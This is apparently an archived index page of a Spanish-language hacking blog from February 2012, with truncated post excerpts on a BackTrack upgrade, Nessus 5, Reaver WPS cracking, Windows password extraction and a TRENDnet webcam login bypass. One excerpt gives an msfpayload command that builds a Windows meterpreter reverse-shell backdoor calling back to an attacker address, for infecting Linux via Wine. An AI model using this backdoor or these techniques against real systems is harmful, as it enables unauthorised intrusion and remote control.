25 feb 2012

Actualizar a BackTrack 5 R2!

Hace poco en el blog oficial de Bactrack se posteó una entrada en donde nos enseñan los comandos y pasos necesarios para actualizar nuestro BackTrack 5 R1 a R2. Esencialmente actualizan el kernel al 3.2.6, agregan herramientas nuevas y algunos parches de seguridad. Aquí como hacer la actualización:

1.- Instalación para actualizar y mejorar BT5 (R1):
apt-get update
apt-get dist-upgrade
reboot
Se instaló el nuevo kernel y las actualizaciones de la versión R2 oficial. Es necesario reiniciar el sistema para que parta el kernel 3.2.6.

23 feb 2012

[Vídeo Metasploit] Intrusión en Linux ejecutando con Wine un payload.exe

Me encontré por Internet con un vídeo donde con Metasploit usan el comando msfpayload para crear  un backdoor (payload) extrañamente echo para Windows, pero para infectar a un sistema Linux. La súper ingeniosa técnica trata de ejecutar el *.exe con Wine. Aunque parezca trivial esto, puede ser muy útil si otras formas de intrusión fallan.


Para crear el Backdoor:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 X > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"lhost"=>"192.168.1.12", "lport"=>"4444"}

[Nessus 5] Nueva versión de este excelente escáner de vulnerabilidades

Estuve de vacaciones, pero no quiero que se me pase poder postear sobre Nessus 5 que salió hace poco con muchas mejoras y con la calidad de siempre.

Nessus es un escáner de vulnerabilidades de la empresa estadounidense Tenable Network Security, sus funcionalidades son las de:

  • Descubrimiento activo de redes
  • Escaneo de vulnerabilidades distribuido
  • Política de auditoria

Permite la exportación de informes en varios formatos donde posteriormente pueden ser asociados con Metasploit y otras herramientas de pentest.

Nessus en su versión 5 ha renovado alguna de sus muchas funcionalidades y ha añadido numerosas mejoras y/o actualizaciones:

19 feb 2012

[Reaver] Cracking Wireless WEP & WPA/WPA2 PSK Mediante WPS (WiFi Protected Setup)

Hay muchas herramientas y formas de crackear Redes Wifi, la mayoría de las herramientas que existen para este fin se basan en capturar suficientes paquetes encriptados con Airodump-ng y recuperar la contraseña con Aircrack-ng. Desencriptar WEP es relativamente fácil, ya que para las claves WEP se usan métodos “estáticos” de inyección para acelerar el proceso, pero la clave en WPA/WPA2 PSK no es estática y solo se pueden utilizar técnicas de fuerza bruta, siendo la única opción utilizar un diccionario para obtener la clave.

Pero WPS (WiFi Protected Setup) permite a los usuarios introducir un PIN de 8 dígitos para conectarse a una red segura sin tener que introducir una contraseña. Reaver implementa un ataque de fuerza bruta contra el WPS a fin de recuperar contraseñas WPA/WPA2 obteniendo el PIN para luego extraer el PSK. Aquí se describe mejor el método http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.

11 feb 2012

Avisos de utilidad pública

Les quiero informar a mis lectores que voy a estar de vacaciones, por lo que me ausentaré 1 semana, por si notan un poco de inactividad.

Me gustaría pedirles a ustedes que se den el tiempo de hacer 2 clics y responder la pregunta que tengo a la derecha  “¿Son efectivos los ataques DDoS como medio de protesta?”, quiero saber la opinión de mis lectores.

Por último quiero decir que un gran maestro (ar3sw0rmed)  a abierto un nuevo foro que promete mucho, los invito a registrarse y participar en esta gran iniciativa:


[+] Salu2
[+] Zion3R

8 feb 2012

Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM)

Bueno, la verdad es que hace una semana que leí sobre está noticia en www.s21sec.com, la intenté poner a prueba, pero no me funcionó xP por falta de tiempo y paciencia, pero fue hace poco que en germanvasquez.wordpress.com explican un poco más detallado el uso de la herramienta en cuestión. Así que ahora entraré a explicar el tema.

Desde ya hace tiempo que la forma de obtener la contraseña de administrador de Windows desde Windows ha sido obteniendo un Hash encriptado en NTLM o LM desde el SAM remoto o local de Windows, una vez obtenido ese Hash hay que crackear la contraseñas por fuerza bruta mediante Rainbow Tables, lo que se demora mucho y se hace imposible si tiene más de 10 dígitos la  contraseña, por lo cual muchas veces se prefieres usar la técnica Pass the Hash que consiste en la posibilidad de autenticarse entre máquinas Windows sin necesidad de password, solamente con el Hash (No se preocupen si no entendieron, este es un mega resumen que da para escribir mucho más).

Ahora... Gracias a un investigador francés apodado "Gentil Kiwi" que ha descubierto una nueva técnica que consta de:

7 feb 2012

Bypass en Webcams permiten espiar a sus usuarios

Se acuerdan de 0day en AirOS (Acceso como Root), que simplemente con cambiar un parametro de la url uno podía bypassear el login y acceder al panel de administrador... Bueno, ahora pasa algo muy parecido con modelos de Webcams y/o Cámaras IP de la empresa TRENDnet (modelos de Webcams afectadas). Este fallo permite conectarse a una de estas Webcams remotamente bypasseando el login e ingresando sin introducir ninguna contraseña. El método es bastante fácil.

1.- Se tiene una cámara IP TRENDnet con módelo afectado:
http://xxx.xxx.xxx.xxx


6 feb 2012

[Cheat-Cube & Cheat-Sheet] Comandos de las Distros más usadas & Principales Comandos Linux

Les traigo una recopilación de 4 cubos con los principales comandos de las 4 distros más usadas de GNU/Linux (Debian, OpenSuse, Fedora, Archlinux), están listas para imprimir, cortar y armar:

OpenSuse

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.